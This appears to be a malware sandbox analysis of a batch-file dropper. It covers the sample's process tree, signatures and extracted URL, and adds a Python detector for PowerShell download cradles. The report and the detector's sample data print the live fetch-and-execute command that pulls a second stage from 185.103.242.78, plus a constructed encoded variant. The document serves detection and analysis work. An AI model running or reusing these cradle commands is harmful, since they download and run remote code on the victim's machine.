Analysis

Max time kernel: 125s
Max time network: 133s
Platform: windows10_x64
Resource: win10v191014
Submitted: 12-02-2020 12:10

Static task: static1

Behavioral task: behavioral1
  Sample: xtSAHQY3.bat
  Resource: win7v191014 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: xtSAHQY3.bat
  Resource: win10v191014 (windows10_x64)
  0 signatures, 0 seconds
General

Target: xtSAHQY3.bat
Size: 197B
MD5: aa9afb0520c167913e548054c13559f1
SHA1: f6d844dac49a6dcd129bfcca531204bb1763c83f
SHA256: a2e505a398d475ddb2eb3e29ebde4b5f0706e31272b3e05cb807fa276fddd771
SHA512: ebe22fd1498a042a6ea69b1ababd78d7d0e630f4d86da7f031fc094358d0532876a9bf9ac3ab9dfa9b4645c095191f68990ed3687aa6a30dddae2150cdea890a
Score: 10/10
Malware Config

Extracted
  Language: ps1
  Source: URLs
  ps1.dropper: http://185.103.242.78/pastes/xtSAHQY3
Signatures

Program crash (1 IoC)
  Processes:
    pid   process
    4984  WerFault.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description                pid   process
    Token: SeRestorePrivilege  4984  WerFault.exe
    Token: SeBackupPrivilege   4984  WerFault.exe
    Token: SeDebugPrivilege    4984  WerFault.exe

Suspicious behavior: EnumeratesProcesses (17 IoCs)
  Processes:
    pid   process
    4984  WerFault.exe (17 occurrences)

Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
    description        ioc                                                                                process
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WerFault.exe
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                    WerFault.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz               WerFault.exe

Enumerates system info in registry (2 TTPs, 2 IoCs)
  Processes:
    description        ioc                                                      process
    Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS       WerFault.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WerFault.exe

Note: every signature above fires on WerFault.exe (PID 4984), the Windows Error Reporting process started with -p 4920, i.e. for the crashed powershell.exe (PID 4920). Reading the CentralProcessor and BIOS keys and adjusting privileges to enumerate processes is what WerFault does while building a crash report, so these IoCs describe the crash handler rather than sandbox evasion by the sample. The behaviour that matters for detection is the PowerShell download cradle in the process tree and the URL it fetches.
Processes

1. C:\Windows\system32\cmd.exe (PID 4876)
   C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xtSAHQY3.bat"

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4920)
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/xtSAHQY3');Invoke-QSYBCPMYHAZCUT;Start-Sleep -s 10000"

      3. C:\Windows\SysWOW64\WerFault.exe (PID 4984)
         C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses; Checks processor information in registry; Enumerates system info in registry

1. \??\c:\windows\system32\taskhostw.exe (PID 4660, separate root; not a child of the sample)
   taskhostw.exe -RegisterDevice -SettingChange -Full

Note: the batch file explicitly launches the 32-bit PowerShell (SysWOW64 path on a 64-bit host), fetches the second-stage script from the paste URL with WebClient.DownloadString, evaluates it in memory with IEX, calls the function Invoke-QSYBCPMYHAZCUT that the fetched script defines, and then sleeps for 10000 seconds (about 2.8 hours) to keep the host process alive. No stage is written to disk, so the command line and the URL are the durable indicators. The powershell.exe process then crashed, which is why WerFault.exe appears as its child.
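The detection a SOC would write for the PowerShell command line in this process tree, as an added example (this is not the sandbox's own logic and not code from the report). It scans process-creation command lines for the fetch-plus-IEX cradle, extracts the URL and the attacker-defined function name, and goes beyond this report by also unwrapping -EncodedCommand payloads, which is the usual way the same cradle is hidden. The first three sample lines are copied from the process tree above; the encoded and benign lines, the host example.invalid and the function name Invoke-Stage2 are constructed for contrast.

```python
"""
Flag PowerShell download cradles in process-creation command lines.

Added example for this report; not the sandbox vendor's detection logic.
"""
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...); the argument is base64 over the UTF-16LE bytes of the script.
ENC_RE = re.compile(r"(?i)(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})")
URL_RE = re.compile(r"(?i)\bhttps?://[^\s'\"()<>;]+")
FUNC_RE = re.compile(r"(?i)\b(Invoke-[A-Za-z0-9_]+)")
# 32-bit PowerShell on a 64-bit host, as in this report's process tree.
WOW64_PS_RE = re.compile(r"(?i)\\SysWOW64\\.*\\powershell\.exe")

CRADLE_PATTERNS = [
    ("invoke_expression", re.compile(r"(?i)\b(?:iex|invoke-expression)\b")),
    ("webclient_download", re.compile(r"(?i)\.Download(?:String|File|Data)\(")),
    ("web_request", re.compile(
        r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|start-bitstransfer)\b")),
]
# Cmdlets that look like "Invoke-X" but are not attacker-defined functions.
BUILTIN_INVOKES = {"invoke-expression", "invoke-webrequest", "invoke-restmethod",
                   "invoke-command", "invoke-item", "invoke-history"}


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way a dropper would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries an -EncodedCommand payload."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload: treat as not encoded rather than crash


def analyze(cmdline: str) -> Dict[str, object]:
    """Classify one process-creation command line."""
    decoded = decode_encoded_command(cmdline)
    # Match against the visible command line and the unwrapped script together.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in CRADLE_PATTERNS if rx.search(text)]
    fetch = "webclient_download" in hits or "web_request" in hits
    if fetch and "invoke_expression" in hits:
        verdict = "download_cradle"  # remote fetch + in-memory eval, as in this report
    elif fetch:
        verdict = "remote_fetch"
    elif "invoke_expression" in hits:
        verdict = "dynamic_eval"
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "patterns": hits,
        "urls": URL_RE.findall(text),
        "functions": sorted({f for f in FUNC_RE.findall(text)
                             if f.lower() not in BUILTIN_INVOKES}),
        "decoded": decoded,
        "wow64_powershell": bool(WOW64_PS_RE.search(cmdline)),
    }


# Sample command lines. The first three are copied from this report's process
# tree; the rest are constructed controls (example.invalid is a reserved name).
SAMPLE_EVENTS = [
    r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xtSAHQY3.bat"',
    r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/xtSAHQY3');Invoke-QSYBCPMYHAZCUT;Start-Sleep -s 10000"''',
    r"C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 704",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -W Hidden -enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2');Invoke-Stage2"),
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
]


def scan(events: List[str]) -> List[Dict[str, object]]:
    """Run analyze() over a batch of command lines, keeping the source line."""
    return [dict(cmdline=e, **analyze(e)) for e in events]


if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(f"{r['verdict']:16} urls={r['urls']} functions={r['functions']} "
              f"wow64={r['wow64_powershell']}")
```

Feed it the CommandLine field of Sysmon event 1 or Security event 4688 (with command-line auditing enabled). The verdict is deliberately tiered: a fetch without IEX is still worth a look, but only the combination reproduces this sample's behaviour, and the decoded script is returned so the analyst can pull URLs and function names from encoded variants without re-running the decode by hand.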